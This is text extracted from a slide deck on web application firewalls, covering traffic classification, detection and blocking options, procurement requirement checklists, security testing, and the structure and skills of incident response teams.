App B 20% 20% 60%
App C 61% 20% 17%
Security Level
63.3% 58.2%
SECURITY
CENTER

70295
©
App Attacks
Incidents
WAF health – site
Site Traffic
E:H D:S BLOCK
E:URL D:A ALARM
1IP 100 Req
Critical
E:IP D:R RATE LIMIT
Medium
High 1IP 10Req
10IP 1000Req
56.00%
58.00%
60.00%
62.00%
64.00%
66.00%
68.00%
70.00%
72.00%
App 1 App2 App3 App4
80% 95% 95%
20% 23% 31%
WAF A – Zone 1 (Main)
WAF B – Zone 2 (sub)
CPU Memory Bandwidth
CPU Memory Bandwidth
By
requirement*

70295
©
Mobile Users
Remote
employee
Web Bot
User
Allowed
automated traffic
HACKED
PURPOSE
BUILD BOTNET
Cloud
Internet
Traffic diversity chaos

70295
©
Valuable users
Malicious
Suspicious
We now talk about
CUSTOMER not USER
Unknown – allow & monitoring
Offending – Blocking
TRAFFIC
MGR
WAF – the Traffic Manager

70295
©
/
Info
param5
products
param6
param2
Login
username
password
Payment
pay
details
Credit card
number
checkout
amount
password
Analytica Pre login Post login Cart no pay Pay
New users 100 50 15 20
Returning users 70 44 5 45
WAF - Traffic Analyzer

70295
©
App: main Number of visits
Time:
/Search engine
Per 1 day Per 1 week Per 1 month
Search engine A 2 10 20
Search engine B 0 2 6
Search engine C 10 150 3000
Traffic break down Valuable customers
(allowed)
Allowed automation Suspicious monitored Malicious – blocked
App A 71% 2% 6% 21%
App B 20% 1% 20% 59%
App C 61% 1.5% 20% 17%
Valuable users – customers – Breakdown
Total RPS 11,000 80000
Top URL 22,000 RPS 11,0000
Total session 12000 active sessions
8000 new sessions
1000 active sessions
8000 new sessions
IP/ session IP-X (3000)
IP-Y (1200)
IP-Z (2000)
IP-X (2300)
IP-Y (1000)
IP-Z (1500)
WAF - Visibility manager

70295
©
WAF levels: Signature Anomaly Restrictions Client interrogation
ID/PS Yes No No No
Bot Manager No No No Yes
WAF Yes Yes Yes No
WAF NG Yes Yes Yes Yes
WAF levels by PE (detection)
*Full requirements in SIRT.club
WAF levels: Web Exploit Brute Force aDDoS Automated traffic
ID/PS Partial Limited Limited Limited
Bot Manager Partial Partial Partial Partial
WAF Good Best Best Good
WAF NG Best Best Best Best

70295
©
Parser - Entities
Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API
Payloads ❑ Text ❑ JSON ❑ XML
User input ❑ Login ❑ Search text ❑ Posting
Traps - Detections
Signature ❑ Informational ❑ Generic exploits ❑ Specific exploit
Anomaly ❑ Request per second (RPS) ❑ Failed log in (FLI) ❑ Session opening
Restriction ❑ Characters sets ❑ RFC & evasion ❑ Flow
Client interrogation ❑ CAPTHCA ❑ Client capabilities ❑ Source ID (SID)
ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging
BLOCK ❑ Blocking page ❑ TCP FIN / RESET /Drop ❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting
FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation
WAF policy requirement (DSMM) by PE

70295
©
WAF RFP
App ❑ Classic ❑ Modern ❑ Mix
Location
Cloud ❑ Cloud public ❑ Cloud Private ❑ Multi cloud ❑ Hybrid (cloud <-> op)
On perm ❑ On perm ❑ multi on perm ❑ Hybrid (op<->cloud)
Management
Management ❑ For you ❑ Semi ❑ You
WAF type ❑ Edge ❑ Perimeter
❑ Perimeter (360)
❑ Mesh
Software
SW type ❑ HW OS SW ❑ OS SW ❑ SW
Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K
Security Mgmt – Sec OPS
Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
Security Reporting ❑ Security center
(learning)
❑ WAG reporting
❑ graphs
❑ Risk reporting
❑ Statistics
❑ Mitigation reporting
❑ Event log
❑ Forensics
OPS
Deployment ❑ ISO file ❑ RPM ❑ VM image
Config ❑ API ❑ Config file ❑ GUI ❑ ______
WAF requirement (DSMM)

70295
©
Utilities
Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only
Log Repository ❑ Internal ❑ External ❑ Size: 6T
❑ Time: 6-month request
❑ Fault tolerance
3rd party ❑ ICAP ❑ Network FW integration
CM ❑ Local
❑ Dedicated
❑ CP utility
❑ Pull / push config
❑ Update/ upgrades
❑ WAF centralized report
❑ Policy
Traffic aggregation (unified
reporting )
Updates and upgrades
Updates ❑ Break Fix
❑ CVE updates
❑ New features
❑ Hotfix
❑ Engineer hot fix
❑ Full update file
❑ GUI
❑ API
❑ Config
❑ RPM
❑ SW
❑ ISO – OS + SW
❑ ISO – SW
Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback
Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old
Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
HA
HA ❑ Load balancing ❑ Cluster ❑ Scaling
Support tools
Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug
Policy export – restore ❑ Text
❑ HTML
❑ Binary ❑ JSON
❑ XML
❑ Manual GUI
❑ API
WAF requirement (DSMM)

70295
©
Web app
App
Web app
Web
Server
App
Server
Database
Server
Testing types App WAF
Testing app for vulnerability
Testing infrastructure for
vulnerabilities
Testing traffic loads
Testing scaling mechanism
Testing supply chain for
vulnerabilities
Testing functionality
Testing hardening n defaults
Testing User input
Testing fuzzing
Testing coverage

70295
©
95%
Web app
Web
Server
App
Server
Database
Server
80% App
Web apps
App
Capacity planning – App / WAF
98%
80%
Breaking points

70295
©
Web app
App
Web app
Web
Server
App
Server
Database
Server
Testing App without WAF
Security testing – App / WAF
Testing the WAF
Testing App with WAF
✓ AE testing - RA
✓ PE testing –CAV/SAP
✓ SE testing - FN

70295
©
Brute force App DDoS Web exploit
60% 70% 50%
Automated attacks
35%
Traps - Detections
Signature ❑ Information ❑ Generic exploits ❑ Specific exploit ❑ Customer
Anomaly ❑ Request Sec (RPS) ❑ Failed log in (FLI) ❑ Session increase ❑ Session opening
Restriction ❑ Characters sets ❑ RFC & evasion
❑ Evasion
❑ Flow ❑ Structure
Client interrogation ❑ CAPTHCA ❑ Client capabilities ❑ Source ID (SID) ❑ If then
ALERT ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging ❑ Mobile App
BLOCK ❑ Blocking page ❑ TCP FIN / RESET
❑ Drop connection
❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting ❑ Access limiting
FOLLOW UP ❑ Redirect to main ❑ Redirect to honeypot ❑ Soft Blocking
WAF assessment

70295
©
How to test it
NF
Vulnerability scanner
Pen test
Red team
Router NWFW WAFNG ADC/LB
Security controls test
Vulnerability scanner (CVE)
Pen test – manual / crafted botnets
Bug bounty - mass wisdom
Red team - proprietary tools

70295
©
• Testing for Vulnerability in the web application
• Use WAF to virtual patch
• Patch the app
• Testing for Vulnerability in the WAF
• Patch the WAF
• DP vs CP
• WAF Bypass – WAF can be bypass but no vulnerability in
the web app to protect
• Fix the WAF
• Holistic approach
• Security exposure – WAF can be bypass and exposing the
web app to a vulnerability that exits (FN)
• Fix the WAF
• Holistic approach
Vulnerability and Security exposure

70295
©
SOC
SECURITY TEAM
External STA
SECURITY TESTING
Testing Personnel
Internal STA
CSIRT
PSIRT
PSIRT – Patching products/ application
CSIRT – Any type of attack on/in the org
STA – Org security advisor / SGP / assessment
3RD PARTY
EVALUATOR SECURITY
TESTING

70295
©
WAF security score - internal
Brute force App DDoS Vul Hunting
WAF security score - external
I: 60%
E: 60%
A: 60%
I: 80%
E: 70%
A: 75%
I: 40%
E: 50%
A: 45%
WAF assessment security score:
• Internal testing
• External testing
• Average
WAF assessment

70295
©
Service
Data
Compute
Disruption
Breach
Compromised
• Ami under attack
• Ami vulnerable
• Ami compromised
• Entities
• Detections
• Prevention
• Rule
• Rule sets
Protection elements
Protection rule
Protection policy
CURRENT POLICY
BYPASS POLICY
MISSING POLICY
FN – missing
RA – rules set
FP – clean traffic
SE – bypass
Current
Limitation
improve
Pre prod
Base prod
Post prod

Vendor A
Hardware
Vendor B
Software
Consulting
Apps provider
3rd part lib
Users
Cloud
provider
Data center
provider
App provider
Complex echo system
Hacking
Crime Hacking
Gov
Internet
provides
Open source
Misc
Vendors
Misc visitors

70295
©
PSIRT
Vul Mgmt
publication
Industry
comm
CSIRT
IR readiness
SIR
Recovery
STA
SGP
Eval
legal
SIRT pillars and responsibility

70295
©
Dev
Support
Pre Sales
Sales
PM
Marketing
Security Trusted Advisor (STA)
Legal
Press
Tech
Comm
Social
Industry
Media
In the ORG
Outside the ORG

70295
©
GM
Sr SE
SIRT scaling VP
Mgr NA
SME
Sr SE
SE
Jn SE
Mgr WW
SME
Sr SE
SE
Dir SIRT
Dir
Mgr NA
Sr SE
SE
Jn SE
• CSIRT
• PSIRT
• TASIRT
CSIRT
PSIRT
TASIRT
TASIRT
PSIRT
CSIRT PSIRT
CSIRT
CSIRT
PSIRT

70295
©
Security Personnel – Traditional
CODERS
ARCHITECT
Staging
ENV
Prod
ENV
DEV
OPS
NF
WAF NG
Application
Server/s
Web
Server/s
Database
Server/s
▪ Deployment – WAF/NF/LB, DNS,
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
▪ Developing the Web App
▪ Web servers
▪ App server
▪ Data bases
▪ Sessions management
▪ Functionality
▪ ….
Where should security be ?

70295
©
Security Personnel – Modern
CODERS
ARCHITECT
Staging
ENV
Prod
ENV
DEV
OPS
NF
WAF NG
▪ App – CIA
▪ Resources
▪ Security
▪ ….
▪ Developing the Web App
▪ Microservices
▪ Containerized
▪ Functionality
▪ ….
DEV OPS
▪ Deployment – WAF/NF/LB, DNS,
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
Where should security be ?
Dev
ENV

70295
©
SE Matrix
Knowledge (theory) Skills (hands on) Experience (time) Notes
Jr SE Sr A STA Jr SE Sr A STA Jr SE Sr A STA
Target Y Y Y Y Y i ii iii iii iii
1Y 3Y 6Y 10Y 14Y
Attack Y Y Y Y Y ii iii iii iii iii
Security Y Y Y Y ii iii iii iii iii
Policy Y Y Y Y i i iii iii iii
Incidents Y Y Y ii iii iii iii
Architecture Y Y i iii ii iii
Operations Y Y Y Y ii i i iii
Traffic control Y Y iii iii iii
Assessment Y i i iii
SIRT
• Jn SE
• SE
• Sr SE
• Architect
• Security Trusted Advisor
i. Basic level
ii. Advance level
iii. SME – Expert

70295
©
6. SECURITY DESIGN
4. POLICY BUILDING
5. RESPONSE
8. OPERATIONS
1. TARGET
2. THREAT INTEL
3. SECURITY
7. TRAFFIC MANAGEMENT
9. ASSESSMENT
Jn SE SE Sr SE Architect TSA
1
2
3
4
1) You think you know but you don’t know
2) You know that you don’t know – learning
3) You don’t know that you know – value
4) You know that you know – Master
Time/
experience
Knowledge

70295
©
PSIRT CSIRT STA Management (CSO)
One-time tasks
Daily tasks
Weekly tasks
Twice-monthly tasks
Monthly tasks
Quarterly tasks
Twice-yearly tasks
Yearly tasks
Per need tasks
Mission board

The WAF book (Web App Firewall )

More Related Content

What's hot (20)

Similar to The WAF book (Web App Firewall ) (20)

More from Lior Rotkovitch (16)

Recently uploaded (20)

The WAF book (Web App Firewall )